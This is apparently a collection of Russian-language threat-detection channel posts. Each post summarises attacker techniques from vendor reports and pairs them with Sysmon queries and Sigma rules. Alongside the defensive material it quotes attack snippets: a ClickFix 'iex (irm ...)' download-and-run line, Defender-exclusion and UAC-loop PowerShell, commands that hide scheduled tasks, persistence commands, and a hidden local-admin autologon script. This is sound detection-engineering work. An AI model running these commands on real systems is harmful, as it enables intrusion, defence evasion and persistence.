Всем привет! 💻✌️

Коллеги из PT рассказали про фишинговую кампанию NetMedved, цель которой - установить NetSupport Manager, в прошлый раз мы рассмотрели LNK-файл, сегодня давайте остановимся на NetSupport Manager

🔭 Обнаружение:

🔤 для работы создается служба Client32 с файлом *\NetSupport\NetSupport Manager\client32.exe

🔤 отслеживаем создание процессов с метаданными

Product: NetSupport Remote Control
Company: NetSupport Ltd

🔤 можем похантить файлы NSM.LIC и NSM.ini

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

PT выпустили описание техник APT31, которые активно используют скрытые задачи планировщика Windows

Для создания скрытой задачи необходимо удалить файл XML и ключ реестра SD (SecurityDescriptor) соответствующей задачи:

reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TEST_TASK" /v SD /f

del %SystemRoot%\System32\Tasks\TEST_TASK /f

🔭 Обнаружение :

🔤 следим за удалением ключей реестра

ProviderName="Microsoft-Windows-Sysmon" and EventId = 12 and EventType = "DeleteValue" and TargetObject = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\*\SD"

p.s. следует проверить конфиги средств сбора событий и DACL на куст реестра

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании

👨‍💻 Посмотрим TTP:

🔤Атака начинается с ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exe

🔤Приложение hta запускает powershell.exe с командлетами iex (irm https://example.com/asf)

🔤Теперь самое интересное. Скачанный ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender

$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'

🔤Для повышения привилегий атакующие запускают powershell.exe с аргументом -Verb RunAs

$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
 -Verb RunAs `
 -PassThru

И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии

🔤Последним этапом идёт установка RAT или стилера

🔭 Обнаружение:

🔤 отслеживаем аргументы powershell Add-MpPreference, Set-MpPreference, -Exclusion*

🔤 отслеживаем создание новых значений в ключах реестра HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\

🔤 отслеживаем события
ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Разберём интересную технику загрузки кода в память explorer.exe

Атакующие могут злоупотреблять функционалом изменения иконок для директорий. Иконки хранятся в DLL, и если в DLL есть функция DllMain, то при выборе изображения код из этой функции будет выполнен.

🔭 Обнаружение:

🔤 Обнаружение может быть достаточно шумным. Рекомендуется отслеживать загрузку любых библиотек из директорий пользователя. Правило можно улучшить, добавив корреляцию со временем создания загружаемого файла

ProviderName="Microsoft-Windows-Sysmon" and EventId=7 
and Image endswith "explorer.exe"
and ImageLoaded startswith "C:\Users\" and Signed="false"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Группировка Bloody Wolf использует jar-файлы в фишинговых кампаниях в Центральной Азии

👨‍💻 Посмотрим TTP:

🔤Жертва получает вредоносное письмо с PDF-приманкой, оформление которой имитирует документы Министерства юстиции
🔤Пользователь открывает PDF и ему предлагается перейти по ссылке для загрузки материалов
🔤Перейдя по ссылке пользователь загружает вредоносный JAR-файл, цель которого - установка NetSupport RAT
🔤Для закрепа в JAR-файле предусмотрены 3 варианта:

bat в %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

@echo off
cd /d "C:\Users\Bruno\Documents\[Something]"
start "" "[net support executable].exe"

автозапуск в реестре

cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [something] /t REG_SZ /d "[path to net support executable]"

создание задачи

cmd.exe /c schtasks /TN "[Something]" /TR "[path to netsupport executable]" /SC ONLOGON /RL LIMITED /F /RU "%USERNAME%"

Видим, что используется нестареющая классика)

🔭 Обнаружение:

🔤 следим за запуском javaw.exe c jar-файлами из пользовательских директорий

javaw.exe -jar C:\Users\Administrator\Downloads
Ndec0d327c39044523564721608ab551fffeae7af144b9657c367cd47aeb16a7a
\dec0d327c39044523564721608ab551fffeae7af144b9657c367cd47aeb16a7a.jar

🔤 отслеживаем запуск дочерних процессов от родителя javaw.exe

🔤 можем похантить jar-файлы, у которых есть ADS - Zone.Identifier

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Nextron Systems поделились TTP группировки Silver Fox

Хакеры распространяли вредоносный инсталятор Telegram Desktop для установки ValleyRat, по средствам фишинга и рекламы

Судя по картинке, применяется огромная цепочка процедур из 14 шагов

👨‍💻 Посмотрим TTP:
🔤Жертва запускает вредоносный инсталлятор Telegram
🔤Малварь создает исключение в Windows Defender
🔤В C:\ProgramData\WindowsData дропается защищенный паролем архив и переименованный двоичный файл 7-Zip
🔤 Из архива извлекается исполняемый файл второго этапа men.exe (основной оркестратор) и настоящий инсталлятор Telegram
🔤 В %public%\WindowsData\ вредоносный men.exe создает ряд бинарей: для bypass uac, уязвимый драйвер Nvidia для EDR Silencer, vbe-файл для закрепа в задачи (WindowsPowerShell.WbemScripting.SWbemLocator) и еще один архив
🔤Файлы последнего архива извлекаются в %public%\WindowsData\, и содержат уязвимый к dll sideloading исполняемый файл для запуска ValleyRat

men.exe изменяет список управления доступом для %PUBLIC%\Documents\WindowsData\, чтобы администраторы не могли удалять файлы и каталоги по этому пути.

🔭 Для обнаружения nextron предложили несколько своих вариантов с sigma-правилами:
🔤 создание файлов в C:\ProgramData\WindowsData\
🔤 добавление диска C: в исключение Windows Defender
🔤 обнаружение запуска 7-Zip для извлечения защищенного архива

title: Password Protected Compressed File Extraction Via 7-Zip
description: Detects usage of 7zip utilities (7z.exe, 7za.exe and
7zr.exe) to extract password protected zip files.
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Description|contains: '7-Zip'
    - OriginalFileName:
      - '7za.exe'
  selection_password:
    CommandLine|contains|all:
      - ' -p'
      - ' x '
      - ' -o'
      - ' -y'
  condition: all of selection_*

🔤 создание и запуск подозрительных файлов exe,dll,sys,vbe в/из директории %PUBLIC%
🔤 создание задачи с исполняемым файлом в директории %PUBLIC%

title: Scheduled Task Creation With Command In Users Public Directory
description: Detects creation of a scheduled task whose action command
points to \Users\Public
detection:
  selection:
    EventID: 4698
    TaskContent|contains:
      - '\\Users\\Public\\'
      - '\\\\Users\\\\Public\\\\'
  condition: selection

🔤 создание службы с исполняемым файлом в директории %PUBLIC%

title: Service Creation In Users Public Directory
description: Detects creation of a service running from \Users\Public
detection:
  selection:
    EventID: 4697
    ServiceFileName|contains:
      - '\\Users\\Public\\'
      - '\\\\Users\\\\Public\\\\'
  condition: selection

следим за ключами реестра HKLM\SYSTEM\CurrentControlSet\Services\

🔤 изменение прав доступа на файлы и директории в %PUBLIC%

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Распространение вредоносов через USB-накопители остается актуальным способом. Цепочка заражения описана в отчете AhnLab и Google

👨‍💻 Как это работает?

🔤На USB-накопители размещается ярлык USB Drive.lnk и скрытые папки sysvolume и USB Drive
🔤LNK стартует VBS-скрипт из папки sysvolume (с именем вида u[6 цифр].vbs), который в свою очередь запускает BAT-файл с аналогичным именем из той же директории
🔤BAT открывает для пользователя директорию USB Drive, в которой хранятся оригинальные файлы. Далее, проверяется наличие dat-файла в текущей директории, и файла C:\Windows<SPACE>\System32\printui.dll. Обращаем внимание на наличие пробела в пути Windows<SPACE>
🔤Если C:\Windows<SPACE>\System32\printui.dll - отсутствует, то:

🔤 в Windows Defender добавляется исключение C:\Windows<SPACE>\System32
🔤 копирует легитимный C:\Windows\System32\printui.exe в C:\Windows<SPACE>\System32
🔤 копируется DAT-файл с USB-носителя в C:\Windows<SPACE>\System32\printui.dll
🔤 запускается C:\Windows<SPACE>\System32\printui.exe, который загрузит C:\Windows<SPACE>\System32\printui.dll
🔤 вредоносная DLL регистрируется в службу DcomLaunch, запускает майнер XMRig в %SystemDirectory%\wsvcz и заражает другие съемные накопители

🔭 Обнаружение:

🔤 отслеживаем запуск опасных расширений со съемных накопителей
🔤 отслеживаем запуск и создание файлов по маске \w?[0-9]{6}\.(vbs|dll|dat|bat)
🔤 отслеживаем загрузку в память ImageLoaded = "*\printui.dll" and Signed="false"
🔤 отслеживаем создание исключений в Windows Defender
🔤 отслеживаем наличие пробелов в путях файлов \s\\

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из ЛК поделились TTP хактивистских группировок 4BID, BO Team и Red Likho

Для подготовки инфраструктуры к уничтожению запускался ps1-скрипт, одна из возможностей которого создание локального пользователя с параметрами PasswordExpires, Disabled = FALSE и добавление его в группу локальных администраторов

$userName = "[REDACTED]"
$password = "[REDACTED]"
$domain = "."
$userExists = net user $userName 2>$null
$addUser = net user $userName $password /add
wmic useraccount where "name='$userName'" set PasswordExpires=FALSE | Write-Log
wmic useraccount where "name='$userName'" set Disabled=FALSE | Write-Log
$group = (Get-LocalGroup -SID "S-1-5-32-544").Name
net localgroup $group $userName /add | Write-Log

Далее, хост настраивается для автоматического входа с созданным пользователем

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "AutoAdminLogon" -Value "1" | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultUserName" -Value $userName | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultPassword" -Value $password | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultDomainName" -Value $domain | Write-Log

Второй индикатор подготовки к уничтожению — перевод системы в безопасный режим с сетью:

cmd.exe /Q /c bcdedit /set {current} safeboot network && shutdown -r -f -t 0 1> \Windows\Temp\WsMeHC 2>&1

🔭 Обнаружение:
🔤 мониторинг создания локальных пользователей и их добавления в группу администраторов
🔤 хантим ключи реестра SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
🔤 отслеживаем запуск bcdedit /set {current} safeboot network

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

В фишинговой кампании по распространению UDPGangster 🔫 злоумышленники использовали интересный способ закрепления в системе

👨‍💻 Как это работает?

Атакующие часто используют директорию автозагрузки пользователя. Путь к ней задаётся в реестре:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

Если изменить значение этого ключа — Windows начнёт запускать программы уже из нового пути, что позволяет скрытно выполнять бинарь при старте системы

🔭 Обнаружение:

🔤 отслеживаем изменения ключа реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

p.s. можем похантить, найдется что-то интересное...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Помните, в одном из отчётов упоминалось, что атакующие при попытке UAC Bypass использовали запуск PowerShell-скрипта (.ps1) в цикле, пока пользователь не согласится 🔫

У этого приёма есть отдельное название — UAC Loop

👨‍💻 Как это работает:

Уведомление о повышении привилегий появляется у пользователя снова и снова до тех пор, пока он не нажмёт Да

Больше похоже на психологический террор)

POC код:

 do {
    try {
        Start-Process notepad.exe -Verb RunAs -ErrorAction Stop
        break
    } catch {
        Start-Sleep 1
    }
} while ($true)

🔭Обнаружение:

🔤Запуск consent.exe более одного раза, будет сильно фолсить
🔤Для powershell отслеживаем
Provider="Powershell" AND Eventid=800 AND EventData contains "Verb RunAs"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Атакующие загружали вредоносные расширения в браузер для кражи данных

👨‍💻 Как это работает?

В Chromium-based браузерах ранее поддерживался аргумент командной строки --load-extension, который позволял запускать браузер с указанием пути к расширению
Позднее данный аргумент был скрыт, однако его всё ещё можно было использовать, если отключить соответствующее ограничение с помощью флага:

--disable-features=DisableLoadExtensionCommandLineSwitch

Таким образом, атакующие могли перезапускать Chrome или Edge с уже загруженным вредоносным расширением без необходимости установки через официальный магазин

В актуальных версиях Chromium данный способ уже не работает

🔭 Обнаружение:

🔤 Хантим аргументы командной строки

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "chrome.exe" and CommandLine contains "--load-extension"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Интересный LPE, но что нам с этим делать?

🔭 Обнаружение:

🔤 утилита zabbix_get, как правило используется с сервера zabbix, который в большинстве своем развернут на Linux. Построим на этом детект

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and (Image endswith: '\zabbix_get.exe' or Description = "zabbix_sender.exe")

p.s. хосты админов могут фолсить

#detection@detectioneasy
#ttp@detectioneasy